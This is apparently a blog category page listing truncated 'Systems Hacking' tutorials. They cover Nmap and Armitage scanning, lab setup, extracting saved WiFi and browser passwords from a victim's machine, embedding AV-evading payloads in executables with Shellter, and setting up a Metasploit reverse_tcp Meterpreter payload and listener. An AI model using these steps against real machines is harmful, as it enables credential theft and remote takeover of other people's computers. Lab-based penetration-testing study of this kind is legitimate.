Browsed by
Category: Systems Hacking

Nmap + Armitage: Fingerprint your victim network

Nmap + Armitage: Fingerprint your victim network

In the previous tutorial, we did set up Metasploitable and performed basic port scanning using Nmap. Here, we are going to use some advanced nmap options to better perform some advanced scanning. I will also introduce you to Armitarge ~ a GUI for the metasploit framework. Let’s start with getting detection of the OS running on the target machine. We type “nmap –O [ip adress] to see the OS” As we can it gives the OS detail as Linux. Metasploitable…

Read More Read More

Basic Lab Setup for Penetration Testing

Basic Lab Setup for Penetration Testing

In this tutorial we are going to see how we can setup a basic pentest lab and perform port scanning. (I feel this should have been the first post as I encourage every reader here to create a personal pentest lab. Performing unauthorized penetration testing and hacking on other people/organization systems MAY LAND YOU IN JAIL). I will assume you already have Kali Linux installed in VirtualBox. Note: Port Scanning without the prior permission is illegal. So please get office…

Read More Read More

How to view saved WiFi password using cmd and python tool

How to view saved WiFi password using cmd and python tool

Hello readers, during our previous tutorial we saw how we can use lazagne and see the saved WiFi and browser password In this tutorial we are going to see how we can view stored WiFi passwords using cmd and also have a chance of creating our own python tool. Steps Open the command prompt as the administrator. Type “netsh” Now type “wlan show profile” to see all the device we connected Now type “wlan show profile [wifi name] key =clear”…

Read More Read More

HOW TO GET SAVED PASSWORD OF THE VICTIM

HOW TO GET SAVED PASSWORD OF THE VICTIM

Hey guys, for this tutorial we shall need to have a physical access to a victims machine. We shall use a popular software tool to be able to retrieve and view passwords of the user. Tools needed Lazagne 2.4 Steps Download this tool using the given link below: https://github.com/AlessandroZ/LaZagne/releases/ Copy the downloaded file into desktop Now open the command prompt(search cmd in start button) Go to desktop using cd Desktop command Now type laZagne.exe to see all list of command…

Read More Read More

How to add a payload to a software program

How to add a payload to a software program

In this tutorial we are going to see how we can add our payload to the executable files in windows. Tools needed Kali linux Shellter – this tool has proved most effective in creating AV evading payloads. The re-encoding capabilities of shellter allows the hacker to create an infinite number of signatures thus allowing for nearly undetection by AV software.  Steps Open the terminal and type apt install shellter      2. Open shellter by typing shellter in terminal         3….

Read More Read More

How to Hack windows machine; Part 2

How to Hack windows machine; Part 2

In the previous tutorial we learnt how to use a payload pre-loaded in kali linux using msfvenom. In this part of the tutorial we shall see how to create a listener. Steps Open terminal and type msfconsole Type use exploit/multi/handler      3.  Nowset payload using set playload windows/meterpreter/reverse_tcp      4. Nowset lhost and lport      5. Type exploit to start listening      6. Now when the victim open the file it created reverse connection We can see that a reverse connection…

Read More Read More

How to Hack windows machine; Part 1

How to Hack windows machine; Part 1

Note: This hack will work only if the Windows defender is turned off Tools used Kali Linux Msfvenom(For creating Payload) Msfconsole(For creating Listener) Steps For this part we need two thing; Payload – is nothing but the application that we use to exploit the user machine       2. Listener – to receive data from the victim machine In this this part, we will create a payload using msfvenom First open the console and type msfvenom –list payload to see all…

Read More Read More